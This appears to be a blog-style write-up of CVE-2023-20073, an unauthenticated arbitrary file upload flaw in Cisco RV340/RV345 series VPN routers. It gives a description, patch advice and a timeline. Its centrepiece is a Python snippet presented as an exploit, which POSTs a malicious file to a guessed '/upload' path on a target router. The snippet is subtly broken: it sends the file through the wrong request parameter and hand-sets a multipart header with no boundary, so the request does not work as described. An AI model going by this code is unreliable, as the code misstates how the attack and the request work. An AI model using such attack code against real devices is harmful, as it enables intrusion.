A security vulnerability has been discovered in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers. This vulnerability, identified as CVE-2023-20073, could potentially allow an unauthenticated, remote attacker to upload arbitrary files to the affected device. This issue arises due to insufficient authorization enforcement mechanisms during file uploads.

Exploit Details

An attacker could exploit this vulnerability by sending a specially crafted HTTP request to an affected device. If the exploit is successful, the attacker would be able to upload arbitrary files to the device, which could lead to significant security risks.

The code snippet below demonstrates how an attacker might send a crafted HTTP request

import requests

url = "http://TARGET_IP_ADDRESS/upload";
payload = {'some_file': open('malicious_file.txt', 'rb')}
headers = {'Content-Type': 'multipart/form-data'}

response = requests.request("POST", url, headers=headers, data=payload)

print(response.text)

In this example, the attacker could replace TARGET_IP_ADDRESS with the IP address of the affected Cisco device and malicious_file.txt with the file they wish to upload.

Original Sources

The vulnerability CVE-2023-20073 was originally disclosed by Cisco in their security advisory, which can be found here:

- Cisco Security Advisory

Recommendations

Affected users are advised to take the following steps to protect their devices from this vulnerability:

1. Update to the latest firmware for your Cisco RV Series Router. The patches for this specific vulnerability have been incorporated in the latest firmware updates for the affected devices.

  - Cisco RV Series Router Firmware Update

Monitor system logs regularly to detect any possible unauthorized access.

By following these recommendations, users of affected devices can mitigate the risks associated with this vulnerability and ensure the security of their networks.

Timeline

Published on: 04/05/2023 16:15:00 UTC
Last modified on: 04/11/2023 19:16:00 UTC